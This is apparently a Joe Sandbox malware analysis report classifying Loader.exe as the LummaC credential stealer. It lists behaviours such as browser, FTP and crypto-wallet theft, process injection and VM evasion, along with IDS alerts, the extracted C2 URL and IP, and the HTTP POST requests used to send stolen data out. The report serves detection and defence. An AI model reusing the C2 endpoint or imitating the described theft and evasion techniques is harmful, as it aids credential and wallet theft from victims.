Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:Loader.exe
Analysis ID:1561387
MD5:0e6fce268473aad13da6aa0c2e93ec94
SHA1:d01b0c69c28b913c4dd3297ca6c78f98d6ba1972
SHA256:bc32cb3d7964088842b7040c23af2bff7f8e07781e8295a3e45871151052e7b7
Tags:exeuser-4k95m
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Loader.exe (PID: 6336 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 0E6FCE268473AAD13DA6AA0C2E93EC94)
    • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Loader.exe (PID: 3864 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 0E6FCE268473AAD13DA6AA0C2E93EC94)
  • cleanup
{"C2 url": "https://property-imper.sbs/api", "Build Version": "yau6Na--6524795094"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000003.1730285852.000000000377D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: Loader.exe PID: 3864JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Loader.exe PID: 3864JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Loader.exe PID: 3864JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T09:49:00.432707+010020283713Unknown Traffic192.168.2.449730172.67.162.84443TCP
            2024-11-23T09:49:02.462552+010020283713Unknown Traffic192.168.2.449731172.67.162.84443TCP
            2024-11-23T09:49:04.724286+010020283713Unknown Traffic192.168.2.449732172.67.162.84443TCP
            2024-11-23T09:49:08.091904+010020283713Unknown Traffic192.168.2.449733172.67.162.84443TCP
            2024-11-23T09:49:10.297377+010020283713Unknown Traffic192.168.2.449734172.67.162.84443TCP
            2024-11-23T09:49:13.021780+010020283713Unknown Traffic192.168.2.449735172.67.162.84443TCP
            2024-11-23T09:49:15.864845+010020283713Unknown Traffic192.168.2.449736172.67.162.84443TCP
            2024-11-23T09:49:18.622598+010020283713Unknown Traffic192.168.2.449739172.67.162.84443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T09:49:01.107725+010020546531A Network Trojan was detected192.168.2.449730172.67.162.84443TCP
            2024-11-23T09:49:03.189450+010020546531A Network Trojan was detected192.168.2.449731172.67.162.84443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T09:49:01.107725+010020498361A Network Trojan was detected192.168.2.449730172.67.162.84443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T09:49:03.189450+010020498121A Network Trojan was detected192.168.2.449731172.67.162.84443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-23T09:49:08.818658+010020480941Malware Command and Control Activity Detected192.168.2.449733172.67.162.84443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Loader.exe.3864.2.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "yau6Na--6524795094"}
            Source: Loader.exeReversingLabs: Detection: 42%
            Source: Loader.exeVirustotal: Detection: 42%Perma Link
            Source: Loader.exeJoe Sandbox ML: detected
            Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0041DAF8 CryptUnprotectData,2_2_0041DAF8
            Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00E6C7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00E6C7DB
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_00442AF0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 40915FE0h2_2_00442AF0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov esi, ecx2_2_0041DAF8
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 3174E150h2_2_00442310
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx2_2_0041F580
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-03F322C9h]2_2_004435B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax2_2_0042FE20
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 61813E67h2_2_00429680
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax2_2_00429680
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push esi2_2_00421F60
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0042FF02
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0042EF3E
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5B126FE8h2_2_00442790
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 4C697C35h2_2_00442790
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, ebx2_2_00441840
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, esi2_2_00425050
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h2_2_0041B02F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h2_2_0041B02F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [ebx], ax2_2_004200C6
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_004210D0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 09785458h2_2_0041A0F8
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], B03B7AC0h2_2_0041A080
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h2_2_0042B880
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax2_2_0040C09A
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], A2545BF7h2_2_00442950
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 4C697C35h2_2_00442950
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F6E92F34h2_2_00442150
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+57ED50D4h]2_2_0043D970
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, ebx2_2_00441920
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, edi2_2_00409990
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h2_2_0041D1BE
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx2_2_0041AA68
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx+00000704h]2_2_0042FA7B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0042FA7B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp ecx2_2_00419A1F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ecx-5CD28A43h]2_2_00419A1F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, bx2_2_00426AC2
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+09h]2_2_00429AEE
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]2_2_00421A80
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_0041D327
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+7Fh]2_2_0040D382
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00438450
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0042D4D0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_0041BCD5
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_00419DD1
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ebx], al2_2_0043048B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edi]2_2_0043E4A0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, ebx2_2_004414B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx ecx, byte ptr [edi+eax]2_2_0040AD40
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-16h]2_2_00427558
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, ebp2_2_00429520
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_0041B5C0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0041ADD5
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h2_2_0042B5DE
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, ebx2_2_004415E0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]2_2_0042ADEA
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_00424DF0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax2_2_0041CD83
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 6DBC3610h2_2_0043DD90
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax2_2_0041B657
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+1Ch]2_2_0041B657
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax2_2_00426E01
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx2_2_00426E01
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]2_2_0042AE30
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then jmp eax2_2_00426ED0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ecx, eax2_2_004256D1
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov byte ptr [ebx], cl2_2_0042E6FC
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 9C142CDAh2_2_004426A0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, ebx2_2_004414B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov edx, ecx2_2_00426760
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov ebp, ebx2_2_00441760
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_0041976F
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then push eax2_2_0042C778
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx]2_2_00441F00
            Source: C:\Users\user\Desktop\Loader.exeCode function: 4x nop then movzx edx, byte ptr [ebp+edi-24h]2_2_0042CF9F

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.162.84:443
            Source: Malware configuration extractorURLs: https://property-imper.sbs/api
            Source: Joe Sandbox ViewIP Address: 172.67.162.84 172.67.162.84
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.162.84:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.162.84:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2OBWBKXCW3B465XR0YTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18174Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WM9XPGEXDDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8747Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GDDRZO2CHAFMICFBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20430Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M1ZIO7H9M3T3NTS1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1236Host: property-imper.sbs
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UWB4V41JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 549687Host: property-imper.sbs
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
            Source: Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: Loader.exe, 00000002.00000003.1813007192.0000000003729000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.1883066535.0000000003729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m0&w
            Source: Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Loader.exe, 00000002.00000003.1784866337.0000000005D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Loader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
            Source: Loader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
            Source: Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Loader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: Loader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Loader.exe, 00000002.00000003.1730226994.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730301767.0000000005D7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Loader.exe, 00000002.00000003.1786258773.0000000005D3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: Loader.exe, Loader.exe, 00000002.00000003.1840834198.0000000003791000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1763675830.0000000005D32000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1876916386.000000000377A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.1883291612.0000000003792000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1763893866.0000000005D31000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1854807698.000000000378E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1876898594.0000000003791000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.1883066535.0000000003729000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1840568875.0000000005D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
            Source: Loader.exe, 00000002.00000003.1854807698.000000000378E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1876898594.0000000003791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/?
            Source: Loader.exe, 00000002.00000002.1883330598.0000000003796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
            Source: Loader.exe, 00000002.00000003.1855174369.0000000003796000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1854660051.0000000003796000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1840746834.0000000003795000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000002.00000002.1883330598.0000000003796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiI
            Source: Loader.exe, 00000002.00000002.1883066535.0000000003718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apie:
            Source: Loader.exe, 00000002.00000002.1883330598.0000000003796000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apil
            Source: Loader.exe, 00000002.00000002.1883066535.0000000003718000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiq
            Source: Loader.exe, 00000002.00000003.1840834198.0000000003791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/g
            Source: Loader.exe, 00000002.00000003.1730824420.0000000005D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: Loader.exe, 00000002.00000003.1785899492.0000000005E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Loader.exe, 00000002.00000003.1785899492.0000000005E5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Loader.exe, 00000002.00000003.1763473279.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730936644.0000000005D89000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000002.00000003.1730824420.0000000005D90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Loader.exe, 00000002.00000003.1730936644.0000000005D64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
